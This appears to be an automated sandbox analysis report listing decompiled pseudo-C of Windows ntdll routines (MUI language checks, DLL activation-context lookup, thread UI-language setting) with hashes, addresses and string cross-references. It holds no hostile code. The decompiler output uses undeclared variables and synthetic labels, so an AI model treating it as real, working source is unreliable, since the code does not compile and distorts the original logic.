API ID: String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption API String ID: 0-2897834094 Opcode ID: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0 Instruction ID: 77767ab52b75f3e53c590baa358a13f09f4292d1bd9eb5528b1371dd471879ac Opcode Fuzzy Hash: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0 Instruction Fuzzy Hash: 09610332524141EFD72DABCAD488E6477B9EB14970BCA843EF9895F301DB349C808F4A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%

E010C3D34(signed int* __ecx) { signed int* _v8; char _v12; signed int* _v16; signed int* _v20; char _v24; signed int _v28; signed int _v32; char _v36; signed int _v40; signed int _v44; signed int* _v48; signed int* _v52; signed int _v56; signed int _v60; char _v68; signed int _t140; signed int _t161; signed int* _t236; signed int* _t242; signed int* _t243; signed int* _t244; signed int* _t245; signed int _t255; void* _t257; signed int _t260; void* _t262; signed int _t264; void* _t267; signed int _t275; signed int* _t276; short* _t277; signed int* _t278; signed int* _t279; signed int* _t280; short* _t281; signed int* _t282; short* _t283; signed int* _t284; void* _t285; _v60 = _v60 | 0xffffffff; _t280 = 0; _t242 = __ecx; _v52 = __ecx; _v8 = 0; _v20 = 0; _v40 = 0; _v28 = 0; _v32 = 0; _v44 = 0; _v56 = 0; _t275 = 0; _v16 = 0; if(__ecx == 0) { _t280 = 0xc000000d; _t140 = 0; L50: *_t242 = *_t242 | 0x00000800; _t242[0x13] = _t140; _t242[0x16] = _v40; _t242[0x18] = _v28; _t242[0x14] = _v32; _t242[0x17] = _t275; _t242[0x15] = _v44; _t242[0x11] = _v56; _t242[0x12] = _v60; return _t280; } if(E010C1B8F(L"WindowsExcludedProcs", &_v36, &_v12, &_v8) >= 0) { _v56 = 1; if(_v8 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8); } _v8 = _t280; } if(E010C1B8F(L"Kernel-MUI-Number-Allowed", &_v36, &_v12, &_v8) >= 0) { _v60 = *_v8; L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8); _v8 = _t280; } if(E010C1B8F(L"Kernel-MUI-Language-Allowed", &_v36, &_v12, &_v8) < 0) { L16: if(E010C1B8F(L"Kernel-MUI-Language-Disallowed", &_v36, &_v12, &_v8) < 0) { L28: if(E010C1B8F(L"Kernel-MUI-Language-SKU", &_v36, &_v12, &_v8) < 0) { L46: _t275 = _v16; L47: _t161 = 0; L48: if(_v8 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8); } _t140 = _v20; if(_t140 != 0) { if(_t275 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275); _t275 = 0; _v28 = 0; _t140 = _v20; } } goto L50; } _t167 = _v12; _t255 = _v12 + 4; _v44 = _t255; if(_t255 == 0) { _t276 = _t280; _v32 = _t280; } else { _t276 = L010D4620(_t255, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255); _t167 = _v12; _v32 = _t276; } if(_t276 == 0) { _v44 = _t280; _t280 = 0xc0000017; goto L46; } else { E010FF3E0(_t276, _v8, _t167); _v48 = _t276; _t277 = E01101370(_t276, 0x1094e90); _pop(_t257); if(_t277 == 0) { L38: _t170 = _v48; if( *_v48 != 0) { E010FBB40(0, &_v68, _t170); if(L010C43C0( &_v68, &_v24) != 0) { _t280 = &(_t280[0]); } } if(_t280 == 0) { _t280 = 0; L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32); _v44 = 0; _v32 = 0; } else { _t280 = 0; } _t174 = _v8; if(_v8 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174); } _v8 = _t280; goto L46; } _t243 = _v48; do { *_t277 = 0; _t278 = _t277 + 2; E010FBB40(_t257, &_v68, _t243); if(L010C43C0( &_v68, &_v24) != 0) { _t280 = &(_t280[0]); } _t243 = _t278; _t277 = E01101370(_t278, 0x1094e90); _pop(_t257); } while (_t277 != 0); _v48 = _t243; _t242 = _v52; goto L38; } } _t191 = _v12; _t260 = _v12 + 4; _v28 = _t260; if(_t260 == 0) { _t275 = _t280; _v16 = _t280; } else { _t275 = L010D4620(_t260, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260); _t191 = _v12; _v16 = _t275; } if(_t275 == 0) { _v28 = _t280; _t280 = 0xc0000017; goto L47; } else { E010FF3E0(_t275, _v8, _t191); _t285 = _t285 + 0xc; _v48 = _t275; _t279 = _t280; _t281 = E01101370(_v16, 0x1094e90); _pop(_t262); if(_t281 != 0) { _t244 = _v48; do { *_t281 = 0; _t282 = _t281 + 2; E010FBB40(_t262, &_v68, _t244); if(L010C43C0( &_v68, &_v24) != 0) { _t279 = &(_t279[0]); } _t244 = _t282; _t281 = E01101370(_t282, 0x1094e90); _pop(_t262); } while (_t281 != 0); _v48 = _t244; _t242 = _v52; } _t201 = _v48; _t280 = 0; if( *_v48 != 0) { E010FBB40(_t262, &_v68, _t201); if(L010C43C0( &_v68, &_v24) != 0) { _t279 = &(_t279[0]); } } if(_t279 == 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16); _v28 = _t280; _v16 = _t280; } _t202 = _v8; if(_v8 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202); } _v8 = _t280; goto L28; } } _t214 = _v12; _t264 = _v12 + 4; _v40 = _t264; if(_t264 == 0) { _v20 = _t280; } else { _t236 = L010D4620(_t264, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264); _t280 = _t236; _v20 = _t236; _t214 = _v12; } if(_t280 == 0) { _t161 = 0; _t280 = 0xc0000017; _v40 = 0; goto L48; } else { E010FF3E0(_t280, _v8, _t214); _t285 = _t285 + 0xc; _v48 = _t280; _t283 = E01101370(_t280, 0x1094e90); _pop(_t267); if(_t283 != 0) { _t245 = _v48; do { *_t283 = 0; _t284 = _t283 + 2; E010FBB40(_t267, &_v68, _t245); if(L010C43C0( &_v68, &_v24) != 0) { _t275 = _t275 + 1; } _t245 = _t284; _t283 = E01101370(_t284, 0x1094e90); _pop(_t267); } while (_t283 != 0); _v48 = _t245; _t242 = _v52; } _t224 = _v48; _t280 = 0; if( *_v48 != 0) { E010FBB40(_t267, &_v68, _t224); if(L010C43C0( &_v68, &_v24) != 0) { _t275 = _t275 + 1; } } if(_t275 == 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20); _v40 = _t280; _v20 = _t280; } _t225 = _v8; if(_v8 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225); } _v8 = _t280; goto L16; } } 0x010c3d3c 0x010c3d42 0x010c3d44 0x010c3d46 0x010c3d49 0x010c3d4c 0x010c3d4f 0x010c3d52 0x010c3d55 0x010c3d58 0x010c3d5b 0x010c3d5f 0x010c3d61 0x010c3d66 0x01118213 0x01118218 0x010c4085 0x010c4088 0x010c408e 0x010c4094 0x010c409a 0x010c40a0 0x010c40a6 0x010c40a9 0x010c40af 0x010c40b6 0x010c40bd 0x010c40bd 0x010c3d83 0x0111821f 0x01118229 0x01118238 0x01118238 0x0111823d 0x0111823d 0x010c3da0 0x010c3daf 0x010c3db5 0x010c3dba 0x010c3dba 0x010c3dd4 0x010c3e94 0x010c3eab 0x010c3f6d 0x010c3f84 0x010c406b 0x010c406b 0x010c406e 0x010c406e 0x010c4070 0x010c4074 0x01118351 0x01118351 0x010c407a 0x010c407f 0x0111835d 0x01118370 0x01118377 0x01118379 0x0111837c 0x0111837c 0x0111835d 0x00000000 0x010c407f 0x010c3f8a 0x010c3f8d 0x010c3f90 0x010c3f95 0x0111830d 0x0111830f 0x010c3f9b 0x010c3fac 0x010c3fae 0x010c3fb1 0x010c3fb1 0x010c3fb6 0x01118317 0x0111831a 0x00000000 0x010c3fbc 0x010c3fc1 0x010c3fc9 0x010c3fd7 0x010c3fda 0x010c3fdd 0x010c4021 0x010c4021 0x010c4029 0x010c4030 0x010c4044 0x010c4046 0x010c4046 0x010c4044 0x010c4049 0x01118327 0x01118334 0x01118339 0x0111833c 0x010c404f 0x010c404f 0x010c404f 0x010c4051 0x010c4056 0x010c4063 0x010c4063 0x010c4068 0x00000000 0x010c4068 0x010c3fdf 0x010c3fe2 0x010c3fe4 0x010c3fe7 0x010c3fef 0x010c4003 0x010c4005 0x010c4005 0x010c400c 0x010c4013 0x010c4016 0x010c4017 0x010c401b 0x010c401e 0x00000000 0x010c401e 0x010c3fb6 0x010c3eb1 0x010c3eb4 0x010c3eb7 0x010c3ebc 0x011182a9 0x011182ab 0x010c3ec2 0x010c3ed3 0x010c3ed5 0x010c3ed8 0x010c3ed8 0x010c3edd 0x011182b3 0x011182b6 0x00000000 0x010c3ee3 0x010c3ee8 0x010c3eed 0x010c3ef0 0x010c3ef3 0x010c3f02 0x010c3f05 0x010c3f08 0x011182c0 0x011182c3 0x011182c5 0x011182c8 0x011182d0 0x011182e4 0x011182e6 0x011182e6 0x011182ed 0x011182f4 0x011182f7 0x011182f8 0x011182fc 0x011182ff 0x011182ff 0x010c3f0e 0x010c3f11 0x010c3f16 0x010c3f1d 0x010c3f31 0x01118307 0x01118307 0x010c3f31 0x010c3f39 0x010c3f48 0x010c3f4d 0x010c3f50 0x010c3f50 0x010c3f53 0x010c3f58 0x010c3f65 0x010c3f65 0x010c3f6a 0x00000000 0x010c3f6a 0x010c3edd 0x010c3dda 0x010c3ddd 0x010c3de0 0x010c3de5 0x01118245 0x010c3deb 0x010c3df7 0x010c3dfc 0x010c3dfe 0x010c3e01 0x010c3e01 0x010c3e06 0x0111824d 0x0111824f 0x01118254 0x00000000 0x010c3e0c 0x010c3e11 0x010c3e16 0x010c3e19 0x010c3e29 0x010c3e2c 0x010c3e2f 0x0111825c 0x0111825f 0x01118261 0x01118264 0x0111826c 0x01118280 0x01118282 0x01118282 0x01118289 0x01118290 0x01118293 0x01118294 0x01118298 0x0111829b 0x0111829b 0x010c3e35 0x010c3e38 0x010c3e3d 0x010c3e44 0x010c3e58 0x011182a3 0x011182a3 0x010c3e58 0x010c3e60 0x010c3e6f 0x010c3e74 0x010c3e77 0x010c3e77 0x010c3e7a 0x010c3e7f 0x010c3e8c 0x010c3e8c 0x010c3e91 0x00000000 0x010c3e91

Strings

WindowsExcludedProcs , xrefs: 010C3D6F Kernel-MUI-Number-Allowed , xrefs: 010C3D8C Kernel-MUI-Language-Disallowed , xrefs: 010C3E97 Kernel-MUI-Language-Allowed , xrefs: 010C3DC0 Kernel-MUI-Language-SKU , xrefs: 010C3F70

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs API String ID: 0-258546922 Opcode ID: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340 Instruction ID: c2b17831431e0bfa39af0513f58992605d2ed05084108f4ce3175b741de74a87 Opcode Fuzzy Hash: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340 Instruction Fuzzy Hash: 3CF15E72D10219EFCB16DF98C980AEEBBB9FF48A50F15406AE545EB250D7749E01CFA0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 44%

E010E8E00(void* __ecx) { signed int _v8; char _v12; void* __ebx; void* __edi; void* __esi; intOrPtr* _t32; intOrPtr _t35; intOrPtr _t43; void* _t46; intOrPtr _t47; void* _t48; signed int _t49; void* _t50; intOrPtr* _t51; signed int _t52; void* _t53; intOrPtr _t55; _v8 = *0x11ad360 ^ _t52; _t49 = 0; _t48 = __ecx; _t55 = *0x11a8464; // 0x74e10110 if(_t55 == 0) { L9: if( !_t49 >= 0) { if(( *0x11a5780 & 0x00000003) != 0) { E01135510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49); } if(( *0x11a5780 & 0x00000010) != 0) { asm("int3"); } } return E010FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49); } _t47 = *((intOrPtr*)(__ecx + 0x18)); _t43 = *0x11a7984; // 0x5e2c80 if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) { _t32 = *((intOrPtr*)(_t48 + 0x28)); if(_t48 == _t43) { _t50 = 0x5c; if( *_t32 == _t50) { _t46 = 0x3f; if( *((intOrPtr*)(_t32 + 2)) == _t46 && *((intOrPtr*)(_t32 + 4)) == _t46 && *((intOrPtr*)(_t32 + 6)) == _t50 && *((intOrPtr*)(_t32 + 8)) != 0 && *((short*)(_t32 + 0xa)) == 0x3a && *((intOrPtr*)(_t32 + 0xc)) == _t50) { _t32 = _t32 + 8; } } } _t51 = *0x11a8464; // 0x74e10110 *0x11ab1e0(_t47, _t32, &_v12); _t49 = *_t51(); if(_t49 >= 0) { L8: _t35 = _v12; if(_t35 != 0) { if( *((intOrPtr*)(_t48 + 0x48)) != 0) { E010E9B10( *((intOrPtr*)(_t48 + 0x48))); _t35 = _v12; } *((intOrPtr*)(_t48 + 0x48)) = _t35; } goto L9; } if(_t49 != 0xc000008a) { if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) { if(_t49 != 0xc00000bb) { goto L8; } } } if(( *0x11a5780 & 0x00000005) != 0) { _push(_t49); E01135510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24); _t53 = _t53 + 0x1c; } _t49 = 0; goto L8; } else { goto L9; } } 0x010e8e0f 0x010e8e16 0x010e8e19 0x010e8e1b 0x010e8e21 0x010e8e7f 0x010e8e85 0x01129354 0x0112936c 0x01129371 0x0112937b 0x01129381 0x01129381 0x0112937b 0x010e8e9d 0x010e8e9d 0x010e8e29 0x010e8e2c 0x010e8e38 0x010e8e3e 0x010e8e43 0x010e8eb5 0x010e8eb9 0x011292aa 0x011292af 0x011292e8 0x011292e8 0x011292af 0x010e8eb9 0x010e8e45 0x010e8e53 0x010e8e5b 0x010e8e5f 0x010e8e78 0x010e8e78 0x010e8e7d 0x010e8ec3 0x010e8ecd 0x010e8ed2 0x010e8ed2 0x010e8ec5 0x010e8ec5 0x00000000 0x010e8e7d 0x010e8e67 0x010e8ea4 0x0112931a 0x00000000 0x00000000 0x01129320 0x010e8ea4 0x010e8e70 0x01129325 0x01129340 0x01129345 0x01129345 0x010e8e76 0x00000000 0x00000000 0x00000000 0x00000000

Strings

Querying the active activation context failed with status 0x%08lx , xrefs: 01129357 Probing for the manifest of DLL "%wZ" failed with status 0x%08lx , xrefs: 0112932A minkernel\ntdll\ldrsnap.c , xrefs: 0112933B, 01129367 LdrpFindDllActivationContext , xrefs: 01129331, 0112935D

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c API String ID: 0-3779518884 Opcode ID: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4 Instruction ID: 8352014c59f4aa9ffd73e6a728855968e8fd09fb9e669915c9d316a5dc861039 Opcode Fuzzy Hash: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4 Instruction Fuzzy Hash: 35412932A043159FDFBAAA5EC84CA7ABAE5AB00358F46C1BBD9D457351E7706DC08381

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%

E010EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) { char _v5; signed int _v8; signed int _v12; char _v16; char _v17; char _v20; signed int _v24; char _v28; char _v32; signed int _v40; void* __ecx; void* __edi; void* __ebp; signed int _t73; intOrPtr* _t75; signed int _t77; signed int _t79; signed int _t81; intOrPtr _t83; intOrPtr _t85; intOrPtr _t86; signed int _t91; signed int _t94; signed int _t95; signed int _t96; signed int _t106; signed int _t108; signed int _t114; signed int _t116; signed int _t118; signed int _t122; signed int _t123; void* _t129; signed int _t130; void* _t132; intOrPtr* _t134; signed int _t138; signed int _t141; signed int _t147; intOrPtr _t153; signed int _t154; signed int _t155; signed int _t170; void* _t174; signed int _t176; signed int _t177; _t129 = __ebx; _push(_t132); _push(__esi); _t174 = _t132; _t73 = !( *( *(_t174 + 0x18))); if(_t73 >= 0) { L5: return _t73; } else { E010CEEF0(0x11a7b60); _t134 = *0x11a7b84; // 0x776f7b80 _t2 = _t174 + 0x24; // 0x24 _t75 = _t2; if( *_t134 != 0x11a7b80) { _push(3); asm("int 0x29"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); _push(0x11a7b60); _t170 = _v8; _v28 = 0; _v40 = 0; _v24 = 0; _v17 = 0; _v32 = 0; __eflags = _t170 & 0xffff7cf2; if((_t170 & 0xffff7cf2) != 0) { L43: _t77 = 0xc000000d; } else { _t79 = _t170 & 0x0000000c; __eflags = _t79; if(_t79 != 0) { __eflags = _t79 - 0xc; if(_t79 == 0xc) { goto L43; } else { goto L9; } } else { _t170 = _t170 | 0x00000008; __eflags = _t170; L9: _t81 = _t170 & 0x00000300; __eflags = _t81 - 0x300; if(_t81 == 0x300) { goto L43; } else { _t138 = _t170 & 0x00000001; __eflags = _t138; _v24 = _t138; if(_t138 != 0) { __eflags = _t81; if(_t81 != 0) { goto L43; } else { goto L11; } } else { L11: _push(_t129); _t77 = E010C6D90( &_v20); _t130 = _t77; __eflags = _t130; if(_t130 >= 0) { _push(_t174); __eflags = _t170 & 0x00000301; if((_t170 & 0x00000301) == 0) { _t176 = _a8; __eflags = _t176; if(__eflags == 0) { L64: _t83 = *[fs:0x18]; _t177 = 0; __eflags = *(_t83 + 0xfb8); if( *(_t83 + 0xfb8) != 0) { E010C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8))); *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0; } *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12; goto L15; } else { asm("sbb edx, edx"); _t114 = E01158938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags); __eflags = _t114; if(_t114 < 0) { _push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n"); E010BB150(); } _t116 = E01156D81(_t176, &_v16); __eflags = _t116; if(_t116 >= 0) { __eflags = _v16 - 2; if(_v16 < 2) { L56: _t118 = E010C75CE(_v20, 5, 0); __eflags = _t118; if(_t118 < 0) { L67: _t130 = 0xc0000017; goto L32; } else { __eflags = _v12; if(_v12 == 0) { goto L67; } else { _t153 = *0x11a8638; // 0x5ee928 _t122 = L010C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5, &_v12); _t154 = _v12; _t130 = _t122; __eflags = _t130; if(_t130 >= 0) { _t123 = *(_t154 + 4) & 0x0000ffff; __eflags = _t123; if(_t123 != 0) { _t155 = _a12; __eflags = _t155; if(_t155 != 0) { *_t155 = _t123; } goto L64; } else { E010C76E2(_t154); goto L41; } } else { E010C76E2(_t154); _t177 = 0; goto L18; } } } } else { __eflags = *_t176; if( *_t176 != 0) { goto L56; } else { __eflags = *(_t176 + 2); if( *(_t176 + 2) == 0) { goto L64; } else { goto L56; } } } } else { _t130 = 0xc000000d; goto L32; } } goto L35; } else { __eflags = _a8; if(_a8 != 0) { _t77 = 0xc000000d; } else { _v5 = 1; L010EFCE3(_v20, _t170); _t177 = 0; __eflags = 0; L15: _t85 = *[fs:0x18]; __eflags = *((intOrPtr*)(_t85 + 0xfc0)) - _t177; if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) { L18: __eflags = _t130; if(_t130 != 0) { goto L32; } else { __eflags = _v5 - _t130; if(_v5 == _t130) { goto L32; } else { _t86 = *[fs:0x18]; __eflags = *((intOrPtr*)(_t86 + 0xfbc)) - _t177; if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) { _t177 = *( *( *[fs:0x18] + 0xfbc)); } __eflags = _t177; if(_t177 == 0) { L31: __eflags = 0; L010C70F0(_t170 | 0x00000030, &_v32, 0, &_v28); goto L32; } else { __eflags = _v24; _t91 = *(_t177 + 0x20); if(_v24 != 0) { *(_t177 + 0x20) = _t91 & 0xfffffff9; goto L31; } else { _t141 = _t91 & 0x00000040; __eflags = _t170 & 0x00000100; if((_t170 & 0x00000100) == 0) { __eflags = _t141; if(_t141 == 0) { L74: _t94 = _t91 & 0xfffffffd | 0x00000004; goto L27; } else { _t177 = E010EFD22(_t177); __eflags = _t177; if(_t177 == 0) { goto L42; } else { _t130 = E010EFD9B(_t177, 0, 4); __eflags = _t130; if(_t130 != 0) { goto L42; } else { _t68 = _t177 + 0x20; *_t68 = *(_t177 + 0x20) & 0xffffffbf; __eflags = *_t68; _t91 = *(_t177 + 0x20); goto L74; } } } goto L35; } else { __eflags = _t141; if(_t141 != 0) { _t177 = E010EFD22(_t177); __eflags = _t177; if(_t177 == 0) { L42: _t77 = 0xc0000001; goto L33; } else { _t130 = E010EFD9B(_t177, 0, 4); __eflags = _t130; if(_t130 != 0) { goto L42; } else { *(_t177 + 0x20) = *(_t177 + 0x20) & 0xffffffbf; _t91 = *(_t177 + 0x20); goto L26; } } goto L35; } else { L26: _t94 = _t91 & 0xfffffffb | 0x00000002; __eflags = _t94; L27: *(_t177 + 0x20) = _t94; __eflags = _t170 & 0x00008000; if((_t170 & 0x00008000) != 0) { _t95 = _a12; __eflags = _t95; if(_t95 != 0) { _t96 = *_t95; __eflags = _t96; if(_t96 != 0) { *((short*)(_t177 + 0x22)) = 0; _t40 = _t177 + 0x20; *_t40 = *(_t177 + 0x20) | _t96 << 0x00000010; __eflags = *_t40; } } } goto L31; } } } } } } } else { _t147 = *( *[fs:0x18] + 0xfc0); _t106 = *(_t147 + 0x20); __eflags = _t106 & 0x00000040; if((_t106 & 0x00000040) != 0) { _t147 = E010EFD22(_t147); __eflags = _t147; if(_t147 == 0) { L41: _t130 = 0xc0000001; L32: _t77 = _t130; goto L33; } else { *(_t147 + 0x20) = *(_t147 + 0x20) & 0xffffffbf; _t106 = *(_t147 + 0x20); goto L17; } goto L35; } else { L17: _t108 = _t106 | 0x00000080; __eflags = _t108; *(_t147 + 0x20) = _t108; *( *[fs:0x18] + 0xfc0) = _t147; goto L18; } } } } L33: } } } } } L35: return _t77; } else { *_t75 = 0x11a7b80; *((intOrPtr*)(_t75 + 4)) = _t134; *_t134 = _t75; *0x11a7b84 = _t75; _t73 = E010CEB70(_t134, 0x11a7b60); if( *0x11a7b20 != 0) { _t73 = *( *[fs:0x30] + 0xc); if( *((char*)(_t73 + 0x28)) == 0) { _t73 = E010CFF60( *0x11a7b20); } } goto L5; } } } 0x010efab0 0x010efab2 0x010efab3 0x010efab4 0x010efabc 0x010efac0 0x010efb14 0x010efb17 0x010efac2 0x010efac8 0x010efacd 0x010efad3 0x010efad3 0x010efadd 0x010efb18 0x010efb1b 0x010efb1d 0x010efb1e 0x010efb1f 0x010efb20 0x010efb21 0x010efb22 0x010efb23 0x010efb24 0x010efb25 0x010efb26 0x010efb27 0x010efb28 0x010efb29 0x010efb2a 0x010efb2b 0x010efb2c 0x010efb2d 0x010efb2e 0x010efb2f 0x010efb3a 0x010efb3b 0x010efb3e 0x010efb41 0x010efb44 0x010efb47 0x010efb4a 0x010efb4d 0x010efb53 0x0112bdcb 0x0112bdcb 0x010efb59 0x010efb5b 0x010efb5b 0x010efb5e 0x0112bdd5 0x0112bdd8 0x00000000 0x0112bdda 0x00000000 0x0112bdda 0x010efb64 0x010efb64 0x010efb64 0x010efb67 0x010efb6e 0x010efb70 0x010efb72 0x00000000 0x010efb78 0x010efb7a 0x010efb7a 0x010efb7d 0x010efb80 0x0112bddf 0x0112bde1 0x00000000 0x0112bde3 0x00000000 0x0112bde3 0x010efb86 0x010efb86 0x010efb86 0x010efb8b 0x010efb90 0x010efb92 0x010efb94 0x010efb9a 0x010efb9b 0x010efba1 0x0112bde8 0x0112bdeb 0x0112bded 0x0112beb5 0x0112beb5 0x0112bebb 0x0112bebd 0x0112bec3 0x0112bed2 0x0112bedd 0x0112bedd 0x0112beed 0x00000000 0x0112bdf3 0x0112bdfe 0x0112be06 0x0112be0b 0x0112be0d 0x0112be0f 0x0112be14 0x0112be19 0x0112be20 0x0112be25 0x0112be27 0x0112be35 0x0112be39 0x0112be46 0x0112be4f 0x0112be54 0x0112be56 0x0112bef8 0x0112bef8 0x00000000 0x0112be5c 0x0112be5c 0x0112be60 0x00000000 0x0112be66 0x0112be66 0x0112be7f 0x0112be84 0x0112be87 0x0112be89 0x0112be8b 0x0112be99 0x0112be9d 0x0112bea0 0x0112beac 0x0112beaf 0x0112beb1 0x0112beb3 0x0112beb3 0x00000000 0x0112bea2 0x0112bea2 0x00000000 0x0112bea2 0x0112be8d 0x0112be8d 0x0112be92 0x00000000 0x0112be92 0x0112be8b 0x0112be60 0x0112be3b 0x0112be3b 0x0112be3e 0x00000000 0x0112be40 0x0112be40 0x0112be44 0x00000000 0x00000000 0x00000000 0x00000000 0x0112be44 0x0112be3e 0x0112be29 0x0112be29 0x00000000 0x0112be29 0x0112be27 0x00000000 0x010efba7 0x010efba7 0x010efbab 0x0112bf02 0x010efbb1 0x010efbb1 0x010efbb8 0x010efbbd 0x010efbbd 0x010efbbf 0x010efbbf 0x010efbc5 0x010efbcb 0x010efbf8 0x010efbf8 0x010efbfa 0x00000000 0x010efc00 0x010efc00 0x010efc03 0x00000000 0x010efc09 0x010efc09 0x010efc0f 0x010efc15 0x010efc23 0x010efc23 0x010efc25 0x010efc27 0x010efc75 0x010efc7c 0x010efc84 0x00000000 0x010efc29 0x010efc29 0x010efc2d 0x010efc30 0x0112bf0f 0x00000000 0x010efc36 0x010efc38 0x010efc3b 0x010efc41 0x0112bf17 0x0112bf19 0x0112bf48 0x0112bf4b 0x00000000 0x0112bf1b 0x0112bf22 0x0112bf24 0x0112bf26 0x00000000 0x0112bf2c 0x0112bf37 0x0112bf39 0x0112bf3b 0x00000000 0x0112bf41 0x0112bf41 0x0112bf41 0x0112bf41 0x0112bf45 0x00000000 0x0112bf45 0x0112bf3b 0x0112bf26 0x00000000 0x010efc47 0x010efc47 0x010efc49 0x010efcb2 0x010efcb4 0x010efcb6 0x010efcdc 0x010efcdc 0x00000000 0x010efcb8 0x010efcc3 0x010efcc5 0x010efcc7 0x00000000 0x010efcc9 0x010efcc9 0x010efccd 0x00000000 0x010efccd 0x010efcc7 0x00000000 0x010efc4b 0x010efc4b 0x010efc4e 0x010efc4e 0x010efc51 0x010efc51 0x010efc54 0x010efc5a 0x010efc5c 0x010efc5f 0x010efc61 0x010efc63 0x010efc65 0x010efc67 0x010efc6e 0x010efc72 0x010efc72 0x010efc72 0x010efc72 0x010efc67 0x010efc61 0x00000000 0x010efc5a 0x010efc49 0x010efc41 0x010efc30 0x010efc27 0x010efc03 0x010efbcd 0x010efbd3 0x010efbd9 0x010efbdc 0x010efbde 0x010efc99 0x010efc9b 0x010efc9d 0x010efcd5 0x010efcd5 0x010efc89 0x010efc89 0x00000000 0x010efc9f 0x010efc9f 0x010efca3 0x00000000 0x010efca3 0x00000000 0x010efbe4 0x010efbe4 0x010efbe4 0x010efbe4 0x010efbe9 0x010efbf2 0x00000000 0x010efbf2 0x010efbde 0x010efbcb 0x010efbab 0x010efc8b 0x010efc8b 0x010efc8c 0x010efb80 0x010efb72 0x010efb5e 0x010efc8d 0x010efc91 0x010efadf 0x010efadf 0x010efae1 0x010efae4 0x010efae7 0x010efaec 0x010efaf8 0x010efb00 0x010efb07 0x010efb0f 0x010efb0f 0x010efb07 0x00000000 0x010efaf8 0x010efadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string! , xrefs: 0112BE0F `3^ , xrefs: 010EFAF1 (^ , xrefs: 0112BE66

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

